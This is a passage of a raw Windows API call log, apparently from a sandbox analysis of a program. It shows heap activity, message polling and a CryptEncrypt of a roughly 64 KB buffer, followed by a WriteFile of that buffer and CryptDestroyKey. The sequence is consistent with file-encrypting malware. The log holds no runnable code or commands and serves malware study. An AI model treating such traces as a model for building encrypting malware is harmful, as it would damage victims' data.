hHeap=0x2af0000) returned 1 [0209.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0209.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0209.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0209.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0209.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0209.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0209.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0209.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0209.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0209.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0209.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0209.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0209.742] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74598 | out: hHeap=0x2af0000) returned 1 [0209.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0209.742] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0209.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0209.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0209.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.742] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0209.742] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0209.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0209.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0209.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0209.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0209.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0209.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0209.742] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0209.742] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0209.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0209.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0209.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0209.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0209.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0209.743] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0209.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0209.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaee8 [0209.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0209.743] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0209.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0209.743] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0209.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0209.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0209.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0209.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0209.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0209.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0209.743] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0209.743] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0209.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0209.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0209.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0209.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0209.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0209.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0209.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0209.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0209.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0209.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0209.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0209.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0209.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0209.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0209.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0209.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0209.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0209.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0209.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0209.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0209.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0209.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0209.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0209.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0209.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0209.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0209.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0209.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0209.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0209.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0209.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0209.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0209.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0209.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0209.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0209.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37c0048 | out: hHeap=0x2af0000) returned 1 [0209.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0209.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0209.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0209.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0209.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0209.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0209.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0209.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0209.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab200 | out: hHeap=0x2af0000) returned 1 [0209.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0209.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0209.751] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0209.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0209.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0209.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0209.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0209.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0209.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0209.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0209.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0209.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0209.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0209.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0209.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0209.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0209.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0209.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0209.751] CryptEncrypt (in: hKey=0x9e1cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xfbd8, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xfbe0) returned 1 [0209.752] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.752] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.752] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.752] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.752] CharLowerBuffW (in: lpsz="byte[64480]", cchLength=0xb | out: lpsz="byte[64480]") returned 0xb [0209.752] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.753] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.753] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.753] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.753] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.753] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.753] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.754] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0209.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab2f0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0209.754] CryptEncrypt (in: hKey=0x9e1cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37c0048*, pdwDataLen=0x8cef60*=0xfbd8, dwBufLen=0xfbe0 | out: pbData=0x37c0048*, pdwDataLen=0x8cef60*=0xfbe0) returned 1 [0209.756] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.756] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.756] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.756] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.756] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.756] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.756] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.756] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0209.756] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.756] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0209.757] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.757] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.757] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0209.757] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.757] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0209.757] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.757] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.757] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.757] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.757] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.757] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.757] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.757] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.757] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.757] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.757] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.757] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.763] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.763] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.763] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.764] WriteFile (in: hFile=0x4dc, lpBuffer=0x2aae878*, nNumberOfBytesToWrite=0xfbe0, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesWritten=0x8cf5e4*=0xfbe0, lpOverlapped=0x0) returned 1 [0209.767] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.767] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.767] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0209.768] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0209.768] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0209.768] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0209.768] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0209.768] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.768] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0209.768] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.768] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0209.770] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0209.770] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0209.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab008, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0209.770] CryptDestroyKey 